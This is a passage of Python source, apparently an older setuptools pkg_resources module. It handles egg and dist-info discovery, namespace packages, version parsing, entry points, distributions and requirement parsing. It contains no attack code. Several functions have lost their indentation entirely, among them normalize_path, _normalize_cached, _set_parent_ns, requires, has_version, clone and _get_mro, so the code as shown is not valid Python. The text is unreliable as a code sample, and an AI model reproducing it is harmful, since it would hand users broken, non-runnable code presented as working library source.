    Find eggs in zip files; possibly multiple nested eggs.
    """
    if importer.archive.endswith('.whl'):
        # wheels are not supported with this finder
        # they don't have PKG-INFO metadata, and won't ever contain eggs
        return
    metadata = EggMetadata(importer)
    if metadata.has_metadata('PKG-INFO'):
        # the archive itself is an egg
        yield Distribution.from_filename(path_item, metadata=metadata)
    if only:
        return  # don't yield nested distros
    for subitem in metadata.resource_listdir('/'):
        if subitem.endswith('.egg'):
            # recurse into eggs stored inside this zip ("basket" layout)
            subpath = os.path.join(path_item, subitem)
            for dist in find_eggs_in_zip(zipimport.zipimporter(subpath), subpath):
                yield dist
# zipimporter path items (zip files / eggs) use the egg-aware finder.
register_finder(zipimport.zipimporter, find_eggs_in_zip)
def find_nothing(importer, path_item, only=False):
    """Fallback finder for importer types that never contain distributions."""
    return ()
# default for unknown importer types: no distributions
register_finder(object,find_nothing)
def find_on_path(importer, path_item, only=False):
    """Yield distributions accessible on a sys.path directory"""
    path_item = _normalize_cached(path_item)

    if os.path.isdir(path_item) and os.access(path_item, os.R_OK):
        if path_item.lower().endswith('.egg'):
            # unpacked egg
            yield Distribution.from_filename(
                path_item, metadata=PathMetadata(
                    path_item, os.path.join(path_item,'EGG-INFO')
                )
            )
        else:
            # scan for .egg and .egg-info in directory
            for entry in os.listdir(path_item):
                lower = entry.lower()
                if lower.endswith('.egg-info') or lower.endswith('.dist-info'):
                    fullpath = os.path.join(path_item, entry)
                    if os.path.isdir(fullpath):
                        # egg-info directory, allow getting metadata
                        metadata = PathMetadata(path_item, fullpath)
                    else:
                        # single PKG-INFO-style metadata file
                        metadata = FileMetadata(fullpath)
                    yield Distribution.from_location(
                        path_item,entry,metadata,precedence=DEVELOP_DIST
                    )
                elif not only and lower.endswith('.egg'):
                    # zipped or unpacked egg inside this directory
                    for dist in find_distributions(os.path.join(path_item, entry)):
                        yield dist
                elif not only and lower.endswith('.egg-link'):
                    # development egg link: the first non-blank line of the
                    # file names the directory actually containing the egg
                    entry_file = open(os.path.join(path_item, entry))
                    try:
                        entry_lines = entry_file.readlines()
                    finally:
                        entry_file.close()
                    for line in entry_lines:
                        if not line.strip(): continue
                        for item in find_distributions(os.path.join(path_item,line.rstrip())):
                            yield item
                        # only the first non-blank line is used
                        break
register_finder(pkgutil.ImpImporter,find_on_path)

if importlib_bootstrap is not None:
    register_finder(importlib_bootstrap.FileFinder, find_on_path)

# Registries for namespace-package support: handlers keyed by importer
# type, and declared namespace packages keyed by parent package name.
_declare_state('dict', _namespace_handlers={})
_declare_state('dict', _namespace_packages={})
def register_namespace_handler(importer_type, namespace_handler):
    """Register `namespace_handler` to declare namespace packages

    `importer_type` is the type or class of a PEP 302 "Importer" (sys.path item
    handler), and `namespace_handler` is a callable like this::

        def namespace_handler(importer,path_entry,moduleName,module):
            # return a path_entry to use for child packages

    Namespace handlers are only called if the importer object has already
    agreed that it can handle the relevant path item, and they should only
    return a subpath if the module __path__ does not already contain an
    equivalent subpath.  For an example namespace handler, see
    ``pkg_resources.file_ns_handler``.
    """
    _namespace_handlers[importer_type] = namespace_handler
def _handle_ns(packageName, path_item):
    """Ensure that named package includes a subpath of path_item (if needed)"""
    importer = get_importer(path_item)
    if importer is None:
        # path item isn't importable at all
        return None
    loader = importer.find_module(packageName)
    if loader is None:
        # this path item doesn't contain the package
        return None
    module = sys.modules.get(packageName)
    if module is None:
        # create an empty namespace-package module shell
        module = sys.modules[packageName] = imp.new_module(packageName)
        module.__path__ = []
        _set_parent_ns(packageName)
    elif not hasattr(module,'__path__'):
        raise TypeError("Not a package:", packageName)
    handler = _find_adapter(_namespace_handlers, importer)
    subpath = handler(importer, path_item, packageName, module)
    if subpath is not None:
        # let the loader run its normal initialization, then make sure every
        # previously-recorded path entry survives on the module's __path__
        path = module.__path__
        path.append(subpath)
        loader.load_module(packageName)
        for path_item in path:
            if path_item not in module.__path__:
                module.__path__.append(path_item)
    return subpath
def declare_namespace(packageName):
    """Declare that package 'packageName' is a namespace package"""

    # the import lock guards _namespace_packages and sys.modules mutation
    imp.acquire_lock()
    try:
        if packageName in _namespace_packages:
            return

        path, parent = sys.path, None
        if '.' in packageName:
            # recursively declare the parent first, then search on its __path__
            parent = '.'.join(packageName.split('.')[:-1])
            declare_namespace(parent)
            if parent not in _namespace_packages:
                __import__(parent)
            try:
                path = sys.modules[parent].__path__
            except AttributeError:
                raise TypeError("Not a package:", parent)

        # Track what packages are namespaces, so when new path items are added,
        # they can be updated
        _namespace_packages.setdefault(parent,[]).append(packageName)
        _namespace_packages.setdefault(packageName,[])

        for path_item in path:
            # Ensure all the parent's path items are reflected in the child,
            # if they apply
            _handle_ns(packageName, path_item)

    finally:
        imp.release_lock()
def fixup_namespace_packages(path_item, parent=None):
    """Ensure that previously-declared namespace packages include path_item"""
    imp.acquire_lock()
    try:
        # iterate the declared children of `parent` (None = top level)
        for package in _namespace_packages.get(parent,()):
            subpath = _handle_ns(package, path_item)
            # recurse so nested namespace packages see the new entry too
            if subpath: fixup_namespace_packages(subpath,package)
    finally:
        imp.release_lock()
def file_ns_handler(importer, path_item, packageName, module):
    """Compute an ns-package subpath for a filesystem or zipfile importer"""
    subpath = os.path.join(path_item, packageName.split('.')[-1])
    normalized = _normalize_cached(subpath)
    # Only return the path if an equivalent entry isn't already present
    already_present = False
    for entry in module.__path__:
        if _normalize_cached(entry) == normalized:
            already_present = True
            break
    if not already_present:
        return subpath
# filesystem and zipfile importers share the same namespace handler
register_namespace_handler(pkgutil.ImpImporter,file_ns_handler)
register_namespace_handler(zipimport.zipimporter,file_ns_handler)

if importlib_bootstrap is not None:
    register_namespace_handler(importlib_bootstrap.FileFinder, file_ns_handler)
def null_ns_handler(importer, path_item, packageName, module):
    """Namespace handler for importer types that support no subpaths."""
    return None
# default for unknown importer types: no namespace subpaths
register_namespace_handler(object,null_ns_handler)
def normalize_path(filename):
"""Normalize a file/dir name for comparison purposes"""
return os.path.normcase(os.path.realpath(filename))
def _normalize_cached(filename,_cache={}):
try:
return _cache[filename]
except KeyError:
_cache[filename] = result = normalize_path(filename)
return result
def _set_parent_ns(packageName):
parts = packageName.split('.')
name = parts.pop()
if parts:
parent = '.'.join(parts)
setattr(sys.modules[parent], name, sys.modules[packageName])
def yield_lines(strs):
    """Yield non-empty/non-comment lines of a ``basestring`` or sequence"""
    if isinstance(strs, basestring):
        for raw in strs.splitlines():
            line = raw.strip()
            # skip blank lines and comments
            if line and not line.startswith('#'):
                yield line
    else:
        # a (possibly nested) sequence of strings: flatten recursively
        for item in strs:
            for line in yield_lines(item):
                yield line
# Regexes used when parsing requirement strings:
LINE_END = re.compile(r"\s*(#.*)?$").match # whitespace and comment
CONTINUE = re.compile(r"\s*\\\s*(#.*)?$").match # line continuation
DISTRO = re.compile(r"\s*((\w|[-.])+)").match # Distribution or extra
VERSION = re.compile(r"\s*(<=?|>=?|==|!=)\s*((\w|[-.])+)").match # ver. info
COMMA = re.compile(r"\s*,").match # comma between items
OBRACKET = re.compile(r"\s*\[").match # open '[' of an extras list
CBRACKET = re.compile(r"\s*\]").match # close ']' of an extras list
MODULE = re.compile(r"\w+(\.\w+)*$").match # dotted module/group name

# Parses egg filenames of the form name-version-pyX.Y-platform
EGG_NAME = re.compile(
    r"(?P<name>[^-]+)"
    r"( -(?P<ver>[^-]+) (-py(?P<pyver>[^-]+) (-(?P<plat>.+))? )? )?",
    re.VERBOSE | re.IGNORECASE
).match

# Helpers for parse_version(): split into digit/alpha/'.'/'-' components,
# and normalize pre-release spellings so they sort correctly.
component_re = re.compile(r'(\d+ | [a-z]+ | \.| -)', re.VERBOSE)
replace = {'pre':'c', 'preview':'c','-':'final-','rc':'c','dev':'@'}.get
def _parse_version_parts(s):
    """Yield comparable sub-strings for one version string (see parse_version)."""
    for piece in component_re.split(s):
        # normalize pre-release spellings ('pre'/'preview'/'rc'/'dev'/'-')
        piece = replace(piece, piece)
        if not piece or piece == '.':
            continue
        if piece[:1] in '0123456789':
            # numeric part: zero-pad so string comparison == numeric comparison
            yield piece.zfill(8)
        else:
            # alpha part: '*' prefix makes it sort before padded numbers
            yield '*' + piece

    yield '*final'  # ensure that alpha/beta/candidate are before final
def parse_version(s):
    """Convert a version string to a chronologically-sortable key

    This is a rough cross between distutils' StrictVersion and LooseVersion;
    if you give it versions that would work with StrictVersion, then it behaves
    the same; otherwise it acts like a slightly-smarter LooseVersion. It is
    *possible* to create pathological version coding schemes that will fool
    this parser, but they should be very rare in practice.

    The returned value will be a tuple of strings.  Numeric portions of the
    version are padded to 8 digits so they will compare numerically, but
    without relying on how numbers compare relative to strings.  Dots are
    dropped, but dashes are retained.  Trailing zeros between alpha segments
    or dashes are suppressed, so that e.g. "2.4.0" is considered the same as
    "2.4". Alphanumeric parts are lower-cased.

    The algorithm assumes that strings like "-" and any alpha string that
    alphabetically follows "final"  represents a "patch level".  So, "2.4-1"
    is assumed to be a branch or patch of "2.4", and therefore "2.4.1" is
    considered newer than "2.4-1", which in turn is newer than "2.4".

    Strings like "a", "b", "c", "alpha", "beta", "candidate" and so on (that
    come before "final" alphabetically) are assumed to be pre-release versions,
    so that the version "2.4" is considered newer than "2.4a1".

    Finally, to handle miscellaneous cases, the strings "pre", "preview", and
    "rc" are treated as if they were "c", i.e. as though they were release
    candidates, and therefore are not as new as a version string that does not
    contain them, and "dev" is replaced with an '@' so that it sorts lower than
    than any other pre-release tag.
    """
    parts = []
    for part in _parse_version_parts(s.lower()):
        if part.startswith('*'):
            if part<'*final':   # remove '-' before a prerelease tag
                while parts and parts[-1]=='*final-': parts.pop()
            # remove trailing zeros from each series of numeric parts
            while parts and parts[-1]=='00000000':
                parts.pop()
        parts.append(part)
    return tuple(parts)
class EntryPoint(object):
    """Object representing an advertised importable object"""

    def __init__(self, name, module_name, attrs=(), extras=(), dist=None):
        if not MODULE(module_name):
            raise ValueError("Invalid module name", module_name)
        self.name = name
        self.module_name = module_name
        self.attrs = tuple(attrs)
        # validate the extras by parsing them through a dummy requirement
        self.extras = Requirement.parse(("x[%s]" % ','.join(extras))).extras
        self.dist = dist

    def __str__(self):
        s = "%s = %s" % (self.name, self.module_name)
        if self.attrs:
            s += ':' + '.'.join(self.attrs)
        if self.extras:
            s += ' [%s]' % ','.join(self.extras)
        return s

    def __repr__(self):
        return "EntryPoint.parse(%r)" % str(self)

    def load(self, require=True, env=None, installer=None):
        """Import and return the advertised object, optionally requiring
        the providing distribution (and extras) first."""
        if require: self.require(env, installer)
        entry = __import__(self.module_name, globals(),globals(), ['__name__'])
        # walk the dotted attribute path down from the module
        for attr in self.attrs:
            try:
                entry = getattr(entry,attr)
            except AttributeError:
                raise ImportError("%r has no %r attribute" % (entry,attr))
        return entry

    def require(self, env=None, installer=None):
        """Activate this entry point's distribution plus its needed extras."""
        if self.extras and not self.dist:
            raise UnknownExtra("Can't require() without a distribution", self)
        list(map(working_set.add,
            working_set.resolve(self.dist.requires(self.extras),env,installer)))

    @classmethod
    def parse(cls, src, dist=None):
        """Parse a single entry point from string `src`

        Entry point syntax follows the form::

            name = some.module:some.attr [extra1,extra2]

        The entry name and module name are required, but the ``:attrs`` and
        ``[extras]`` parts are optional
        """
        try:
            attrs = extras = ()
            name,value = src.split('=',1)
            if '[' in value:
                # split off and validate the "[extras]" suffix
                value,extras = value.split('[',1)
                req = Requirement.parse("x["+extras)
                if req.specs: raise ValueError
                extras = req.extras
            if ':' in value:
                # split off and validate the dotted attribute path
                value,attrs = value.split(':',1)
                if not MODULE(attrs.rstrip()):
                    raise ValueError
                attrs = attrs.rstrip().split('.')
        except ValueError:
            raise ValueError(
                "EntryPoint must be in 'name=module:attrs [extras]' format",
                src
            )
        else:
            return cls(name.strip(), value.strip(), attrs, extras, dist)

    @classmethod
    def parse_group(cls, group, lines, dist=None):
        """Parse an entry point group"""
        if not MODULE(group):
            raise ValueError("Invalid group name", group)
        this = {}
        for line in yield_lines(lines):
            ep = cls.parse(line, dist)
            if ep.name in this:
                raise ValueError("Duplicate entry point", group, ep.name)
            this[ep.name]=ep
        return this

    @classmethod
    def parse_map(cls, data, dist=None):
        """Parse a map of entry point groups"""
        if isinstance(data,dict):
            data = data.items()
        else:
            # string or sequence of lines with "[group]" section headers
            data = split_sections(data)
        maps = {}
        for group, lines in data:
            if group is None:
                if not lines:
                    continue
                raise ValueError("Entry points must be listed in groups")
            group = group.strip()
            if group in maps:
                raise ValueError("Duplicate group name", group)
            maps[group] = cls.parse_group(group, lines, dist)
        return maps
def _remove_md5_fragment(location):
if not location:
return ''
parsed = urlparse(location)
if parsed[-1].startswith('md5='):
return urlunparse(parsed[:-1] + ('',))
return location
class Distribution(object):
    """Wrap an actual or potential sys.path entry w/metadata"""

    # metadata file consulted for the version when it isn't given explicitly
    PKG_INFO = 'PKG-INFO'

    def __init__(self, location=None, metadata=None, project_name=None,
            version=None, py_version=PY_MAJOR, platform=None,
            precedence=EGG_DIST):
        self.project_name = safe_name(project_name or 'Unknown')
        if version is not None:
            # otherwise the version is read lazily from metadata (see .version)
            self._version = safe_version(version)
        self.py_version = py_version
        self.platform = platform
        self.location = location
        self.precedence = precedence
        self._provider = metadata or empty_provider
    @classmethod
    def from_location(cls,location,basename,metadata=None,**kw):
        """Build a Distribution (or subclass) from a path plus egg/dist filename."""
        project_name, version, py_version, platform = [None]*4
        basename, ext = os.path.splitext(basename)
        if ext.lower() in _distributionImpl:
            # .dist-info gets much metadata differently
            match = EGG_NAME(basename)
            if match:
                project_name, version, py_version, platform = match.group(
                    'name','ver','pyver','plat'
                )
            # dispatch to the Distribution subclass for this extension
            cls = _distributionImpl[ext.lower()]
        return cls(
            location, metadata, project_name=project_name, version=version,
            py_version=py_version, platform=platform, **kw
        )

    # tuple used for ordering, equality, and hashing of distributions
    hashcmp = property(
        lambda self: (
            getattr(self,'parsed_version',()),
            self.precedence,
            self.key,
            _remove_md5_fragment(self.location),
            self.py_version,
            self.platform
        )
    )
    # All hashing and rich comparisons delegate to the `hashcmp` tuple.
    def __hash__(self): return hash(self.hashcmp)
    def __lt__(self, other):
        return self.hashcmp < other.hashcmp
    def __le__(self, other):
        return self.hashcmp <= other.hashcmp
    def __gt__(self, other):
        return self.hashcmp > other.hashcmp
    def __ge__(self, other):
        return self.hashcmp >= other.hashcmp
    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            # It's not a Distribution, so they are not equal
            return False
        return self.hashcmp == other.hashcmp
    def __ne__(self, other):
        return not self == other
    # These properties have to be lazy so that we don't have to load any
    # metadata until/unless it's actually needed.  (i.e., some distributions
    # may not know their name or version without loading PKG-INFO)

    @property
    def key(self):
        """Lower-cased project name, cached on first access."""
        try:
            return self._key
        except AttributeError:
            self._key = key = self.project_name.lower()
            return key

    @property
    def parsed_version(self):
        """Sortable form of .version (see parse_version), cached."""
        try:
            return self._parsed_version
        except AttributeError:
            self._parsed_version = pv = parse_version(self.version)
            return pv

    @property
    def version(self):
        """Version string; read lazily from PKG-INFO when not set explicitly."""
        try:
            return self._version
        except AttributeError:
            for line in self._get_metadata(self.PKG_INFO):
                if line.lower().startswith('version:'):
                    self._version = safe_version(line.split(':',1)[1].strip())
                    return self._version
            else:
                raise ValueError(
                    "Missing 'Version:' header and/or %s file" % self.PKG_INFO, self
                )
    @property
    def _dep_map(self):
        """
        Cached map of extra name (or None for unconditional requirements)
        -> list of Requirements, parsed from requires.txt / depends.txt and
        filtered by any environment markers on the section headers.
        """
        try:
            return self.__dep_map
        except AttributeError:
            dm = self.__dep_map = {None: []}
            for name in 'requires.txt', 'depends.txt':
                for extra,reqs in split_sections(self._get_metadata(name)):
                    if extra:
                        if ':' in extra:
                            # section header of the form "extra:marker"
                            extra, marker = extra.split(':',1)
                            if invalid_marker(marker):
                                reqs=[] # XXX warn
                            elif not evaluate_marker(marker):
                                # marker is false in this environment
                                reqs=[]
                        extra = safe_extra(extra) or None
                    dm.setdefault(extra,[]).extend(parse_requirements(reqs))
            return dm
def requires(self,extras=()):
"""List of Requirements needed for this distro if `extras` are used"""
dm = self._dep_map
deps = []
deps.extend(dm.get(None,()))
for ext in extras:
try:
deps.extend(dm[safe_extra(ext)])
except KeyError:
raise UnknownExtra(
"%s has no such extra feature %r" % (self, ext)
)
return deps
    def _get_metadata(self,name):
        """Yield lines of metadata file `name`; yields nothing if absent."""
        if self.has_metadata(name):
            for line in self.get_metadata_lines(name):
                yield line

    def activate(self,path=None):
        """Ensure distribution is importable on `path` (default=sys.path)"""
        if path is None: path = sys.path
        self.insert_on(path)
        if path is sys.path:
            # also wire up any namespace packages this distribution declares
            fixup_namespace_packages(self.location)
            list(map(declare_namespace, self._get_metadata('namespace_packages.txt')))

    def egg_name(self):
        """Return what this distribution's standard .egg filename should be"""
        filename = "%s-%s-py%s" % (
            to_filename(self.project_name), to_filename(self.version),
            self.py_version or PY_MAJOR
        )

        if self.platform:
            filename += '-'+self.platform
        return filename
    def __repr__(self):
        if self.location:
            return "%s (%s)" % (self,self.location)
        else:
            return str(self)

    def __str__(self):
        # tolerate metadata that yields no usable version
        try: version = getattr(self,'version',None)
        except ValueError: version = None
        version = version or "[unknown version]"
        return "%s %s" % (self.project_name,version)

    def __getattr__(self,attr):
        """Delegate all unrecognized public attributes to .metadata provider"""
        if attr.startswith('_'):
            raise AttributeError(attr)
        return getattr(self._provider, attr)

    @classmethod
    def from_filename(cls,filename,metadata=None, **kw):
        """Build a Distribution from a (possibly unnormalized) filename."""
        return cls.from_location(
            _normalize_cached(filename), os.path.basename(filename), metadata,
            **kw
        )

    def as_requirement(self):
        """Return a ``Requirement`` that matches this distribution exactly"""
        return Requirement.parse('%s==%s' % (self.project_name, self.version))

    def load_entry_point(self, group, name):
        """Return the `name` entry point of `group` or raise ImportError"""
        ep = self.get_entry_info(group,name)
        if ep is None:
            raise ImportError("Entry point %r not found" % ((group,name),))
        return ep.load()

    def get_entry_map(self, group=None):
        """Return the entry point map for `group`, or the full entry map"""
        try:
            ep_map = self._ep_map
        except AttributeError:
            # parse and cache all advertised entry points on first access
            ep_map = self._ep_map = EntryPoint.parse_map(
                self._get_metadata('entry_points.txt'), self
            )
        if group is not None:
            return ep_map.get(group,{})
        return ep_map

    def get_entry_info(self, group, name):
        """Return the EntryPoint object for `group`+`name`, or ``None``"""
        return self.get_entry_map(group).get(name)
    def insert_on(self, path, loc = None):
        """Insert self.location in path before its nearest parent directory"""
        loc = loc or self.location
        if not loc:
            return
        nloc = _normalize_cached(loc)
        bdir = os.path.dirname(nloc)
        # npath mirrors `path` entry-for-entry with each item normalized,
        # so comparisons are case/symlink-insensitive while `path` itself
        # keeps the caller's original strings.
        npath= [(p and _normalize_cached(p) or p) for p in path]
        for p, item in enumerate(npath):
            if item==nloc:
                break
            elif item==bdir and self.precedence==EGG_DIST:
                # if it's an .egg, give it precedence over its directory
                if path is sys.path:
                    self.check_version_conflict()
                path.insert(p, loc)
                npath.insert(p, nloc)
                break
        else:
            # loc was not found and no insertion point applied: append at end.
            if path is sys.path:
                self.check_version_conflict()
            path.append(loc)
            return
        # p is the spot where we found or inserted loc; now remove duplicates
        while 1:
            try:
                np = npath.index(nloc, p+1)
            except ValueError:
                break
            else:
                # Delete the later duplicate from both parallel lists.
                del npath[np], path[np]
                p = np # ha!
        return
    def check_version_conflict(self):
        """Warn when an already-imported top-level module would shadow this dist."""
        if self.key=='setuptools':
            return # ignore the inevitable setuptools self-conflicts :(
        nsp = dict.fromkeys(self._get_metadata('namespace_packages.txt'))
        loc = normalize_path(self.location)
        for modname in self._get_metadata('top_level.txt'):
            # Skip modules not yet imported, and namespace packages, which
            # legitimately span multiple locations.
            if (modname not in sys.modules or modname in nsp
                or modname in _namespace_packages):
                continue
            if modname in ('pkg_resources', 'setuptools', 'site'):
                continue
            fn = getattr(sys.modules[modname], '__file__', None)
            # If the imported module already comes from this distribution's
            # location, there is no conflict to report.
            if fn and (normalize_path(fn).startswith(loc) or
                       fn.startswith(self.location)):
                continue
            issue_warning(
                "Module %s was already imported from %s, but %s is being added"
                " to sys.path" % (modname, fn, self.location),
            )
def has_version(self):
try:
self.version
except ValueError:
issue_warning("Unbuilt egg for "+repr(self))
return False
return True
def clone(self,**kw):
"""Copy this distribution, substituting in any changed keyword args"""
for attr in (
'project_name', 'version', 'py_version', 'platform', 'location',
'precedence'
):
kw.setdefault(attr, getattr(self,attr,None))
kw.setdefault('metadata', self._provider)
return self.__class__(**kw)
@property
def extras(self):
return [dep for dep in self._dep_map if dep]
class DistInfoDistribution(Distribution):
    """Wrap an actual or potential sys.path entry w/metadata, .dist-info style"""
    PKG_INFO = 'METADATA'
    # Matches a version token between '(' or ',' and ',' or ')', used to
    # prefix bare versions with '==' in _preparse_requirement.
    EQEQ = re.compile(r"([\(,])\s*(\d.*?)\s*([,\)])")
    @property
    def _parsed_pkg_info(self):
        """Parse and cache metadata"""
        try:
            return self._pkg_info
        except AttributeError:
            from email.parser import Parser
            self._pkg_info = Parser().parsestr(self.get_metadata(self.PKG_INFO))
            return self._pkg_info
    @property
    def _dep_map(self):
        # Lazily computed {extra_name_or_None: [Requirement, ...]} mapping;
        # cached under the name-mangled __dep_map attribute.
        try:
            return self.__dep_map
        except AttributeError:
            self.__dep_map = self._compute_dependencies()
            return self.__dep_map
    def _preparse_requirement(self, requires_dist):
        """Convert 'Foobar (1); baz' to ('Foobar ==1', 'baz')
        Split environment marker, add == prefix to version specifiers as
        necessary, and remove parenthesis.
        """
        parts = requires_dist.split(';', 1) + ['']
        distvers = parts[0].strip()
        mark = parts[1].strip()
        distvers = re.sub(self.EQEQ, r"\1==\2\3", distvers)
        distvers = distvers.replace('(', '').replace(')', '')
        return (distvers, mark)
    def _compute_dependencies(self):
        """Recompute this distribution's dependencies."""
        from _markerlib import compile as compile_marker
        dm = self.__dep_map = {None: []}
        reqs = []
        # Including any condition expressions
        for req in self._parsed_pkg_info.get_all('Requires-Dist') or []:
            distvers, mark = self._preparse_requirement(req)
            parsed = next(parse_requirements(distvers))
            # Each requirement carries its compiled environment-marker test.
            parsed.marker_fn = compile_marker(mark)
            reqs.append(parsed)
        def reqs_for_extra(extra):
            # Requirements whose marker holds when 'extra' is set as given.
            for req in reqs:
                if req.marker_fn(override={'extra':extra}):
                    yield req
        common = frozenset(reqs_for_extra(None))
        dm[None].extend(common)
        for extra in self._parsed_pkg_info.get_all('Provides-Extra') or []:
            extra = safe_extra(extra.strip())
            # Per-extra list excludes requirements already in the common set.
            dm[extra] = list(frozenset(reqs_for_extra(extra)) - common)
        return dm
# Map from metadata directory/file suffix to the Distribution subclass used
# to represent entries carrying that kind of metadata.
_distributionImpl = {
    '.egg': Distribution,
    '.egg-info': Distribution,
    '.dist-info': DistInfoDistribution,
    }
def issue_warning(*args,**kw):
    """Emit a warning attributed to the first caller outside this module."""
    level = 1
    g = globals()
    try:
        # find the first stack frame that is *not* code in
        # the pkg_resources module, to use for the warning
        while sys._getframe(level).f_globals is g:
            level += 1
    except ValueError:
        # Ran off the top of the stack; fall back to the deepest level found.
        pass
    from warnings import warn
    warn(stacklevel = level+1, *args, **kw)
def parse_requirements(strs):
    """Yield ``Requirement`` objects for each specification in `strs`
    `strs` must be an instance of ``basestring``, or a (possibly-nested)
    iterable thereof.
    """
    # create a steppable iterator, so we can handle \-continuations
    lines = iter(yield_lines(strs))
    def scan_list(ITEM,TERMINATOR,line,p,groups,item_name):
        # Consume a comma-separated list of ITEM-matches starting at offset
        # `p` of `line`, following backslash continuations onto subsequent
        # physical lines; returns the updated (line, position, items).
        items = []
        while not TERMINATOR(line,p):
            if CONTINUE(line,p):
                try:
                    line = next(lines)
                    p = 0
                except StopIteration:
                    raise ValueError(
                        "\\ must not appear on the last nonblank line"
                    )
            match = ITEM(line,p)
            if not match:
                raise ValueError("Expected "+item_name+" in",line,"at",line[p:])
            items.append(match.group(*groups))
            p = match.end()
            match = COMMA(line,p)
            if match:
                p = match.end() # skip the comma
            elif not TERMINATOR(line,p):
                raise ValueError(
                    "Expected ',' or end-of-list in",line,"at",line[p:]
                )
        match = TERMINATOR(line,p)
        if match: p = match.end() # skip the terminator, if any
        return line, p, items
    for line in lines:
        match = DISTRO(line)
        if not match:
            raise ValueError("Missing distribution spec", line)
        project_name = match.group(1)
        p = match.end()
        extras = []
        # Optional "[extra1,extra2]" section after the project name.
        match = OBRACKET(line,p)
        if match:
            p = match.end()
            line, p, extras = scan_list(
                DISTRO, CBRACKET, line, p, (1,), "'extra' name"
            )
        # Remaining text is the comma-separated "<op><version>" spec list.
        line, p, specs = scan_list(VERSION,LINE_END,line,p,(1,2),"version spec")
        specs = [(op,safe_version(val)) for op,val in specs]
        yield Requirement(project_name, specs, extras)
def _sort_dists(dists):
tmp = [(dist.hashcmp,dist) for dist in dists]
tmp.sort()
dists[::-1] = [d for hc,d in tmp]
class Requirement:
    def __init__(self, project_name, specs, extras):
        """DO NOT CALL THIS UNDOCUMENTED METHOD; use Requirement.parse()!"""
        self.unsafe_name, project_name = project_name, safe_name(project_name)
        self.project_name, self.key = project_name, project_name.lower()
        # Each index entry: (parsed version, state_machine row, operator, raw text).
        index = [(parse_version(v),state_machine[op],op,v) for op,v in specs]
        index.sort()
        self.specs = [(op,ver) for parsed,trans,op,ver in index]
        self.index, self.extras = index, tuple(map(safe_extra,extras))
        # hashCmp captures exactly what equality and hashing depend on.
        self.hashCmp = (
            self.key, tuple([(op,parsed) for parsed,trans,op,ver in index]),
            frozenset(self.extras)
        )
        self.__hash = hash(self.hashCmp)
    def __str__(self):
        specs = ','.join([''.join(s) for s in self.specs])
        extras = ','.join(self.extras)
        if extras: extras = '[%s]' % extras
        return '%s%s%s' % (self.project_name, extras, specs)
    def __eq__(self,other):
        return isinstance(other,Requirement) and self.hashCmp==other.hashCmp
    def __contains__(self,item):
        # `item` may be a Distribution, a version string, or a parsed version;
        # it satisfies the requirement if the state_machine transitions over
        # all sorted version rules end in an accepting state.
        if isinstance(item,Distribution):
            if item.key != self.key: return False
            if self.index: item = item.parsed_version # only get if we need it
        elif isinstance(item,basestring):
            item = parse_version(item)
        last = None
        compare = lambda a, b: (a > b) - (a < b) # -1, 0, 1
        for parsed,trans,op,ver in self.index:
            action = trans[compare(item,parsed)] # Indexing: 0, 1, -1
            if action=='F':
                return False
            elif action=='T':
                return True
            elif action=='+':
                last = True
            elif action=='-' or last is None: last = False
        if last is None: last = True # no rules encountered
        return last
    def __hash__(self):
        return self.__hash
    def __repr__(self): return "Requirement.parse(%r)" % str(self)
    @staticmethod
    def parse(s):
        # Parse exactly one requirement from `s`; zero or several is an error.
        reqs = list(parse_requirements(s))
        if reqs:
            if len(reqs)==1:
                return reqs[0]
            raise ValueError("Expected only one requirement", s)
        raise ValueError("No requirements found", s)
# Version-comparison transition table used by Requirement.__contains__.
# For each operator the three characters are indexed by the sign of
# cmp(candidate, spec_version): index 0 = equal, 1 = greater, -1 = less
# (the "# =><" legend below).  'T'/'F' accept/reject immediately, '+'/'-'
# update the running default, and any other character ('.') falls through
# to the ``last is None`` handling in __contains__.
state_machine = {
    # =><
    '<': '--T',
    '<=': 'T-T',
    '>': 'F+F',
    '>=': 'T+F',
    '==': 'T..',
    '!=': 'F++',
}
def _get_mro(cls):
"""Get an mro for a type or classic class"""
if not isinstance(cls,type):
class cls(cls,object): pass
return cls.__mro__[1:]
return cls.__mro__
def _find_adapter(registry, ob):
    """Return an adapter factory for `ob` from `registry`"""
    # Walk the mro of ob's class (falling back to type(ob) for objects
    # without __class__) and return the first registered factory.
    candidates = _get_mro(getattr(ob, '__class__', type(ob)))
    for candidate in candidates:
        if candidate in registry:
            return registry[candidate]
def ensure_directory(path):
    """Ensure that the parent directory of `path` exists"""
    parent = os.path.dirname(path)
    if not os.path.isdir(parent):
        os.makedirs(parent)
def split_sections(s):
    """Split a string or iterable thereof into (section,content) pairs
    Each ``section`` is a stripped version of the section header ("[section]")
    and each ``content`` is a list of stripped lines excluding blank lines and
    comment-only lines. If there are any such lines before the first section
    header, they're returned in a first ``section`` of ``None``.
    """
    section = None
    content = []
    for line in yield_lines(s):
        if not line.startswith("["):
            content.append(line)
            continue
        if not line.endswith("]"):
            raise ValueError("Invalid section heading", line)
        # Flush the previous segment before starting the new section.
        if section or content:
            yield section, content
        section = line[1:-1].strip()
        content = []
    # wrap up last segment
    yield section, content
def _mkstemp(*args,**kw):
    """``tempfile.mkstemp`` wrapper that runs with the unsandboxed ``os.open``."""
    from tempfile import mkstemp
    old_open = os.open
    try:
        os.open = os_open # temporarily bypass sandboxing
        return mkstemp(*args,**kw)
    finally:
        os.open = old_open # and then put it back
# Set up global resource manager (deliberately not state-saved)
_manager = ResourceManager()
def _initialize(g):
    # Re-export every public ResourceManager method into namespace `g`
    # (this module's globals) as module-level convenience functions.
    for name in dir(_manager):
        if not name.startswith('_'):
            g[name] = getattr(_manager, name)
_initialize(globals())
# Prepare the master working set and make the ``require()`` API available
_declare_state('object', working_set = WorkingSet())
try:
    # Does the main program list any requirements?
    from __main__ import __requires__
except ImportError:
    pass # No: just use the default working set based on sys.path
else:
    # Yes: ensure the requirements are met, by prefixing sys.path if necessary
    try:
        working_set.require(__requires__)
    except VersionConflict: # try it without defaults already on sys.path
        working_set = WorkingSet([]) # by starting with an empty path
        for dist in working_set.resolve(
            parse_requirements(__requires__), Environment()
        ):
            working_set.add(dist)
        for entry in sys.path: # add any missing entries from sys.path
            if entry not in working_set.entries:
                working_set.add_entry(entry)
        sys.path[:] = working_set.entries # then copy back to sys.path
# Module-level aliases for the master working set's bound methods.
require = working_set.require
iter_entry_points = working_set.iter_entry_points
add_activation_listener = working_set.subscribe
run_script = working_set.run_script
run_main = run_script # backward compatibility
# Activate all distributions already on sys.path, and ensure that
# all distributions added to the working set in the future (e.g. by
# calling ``require()``) will get activated as well.
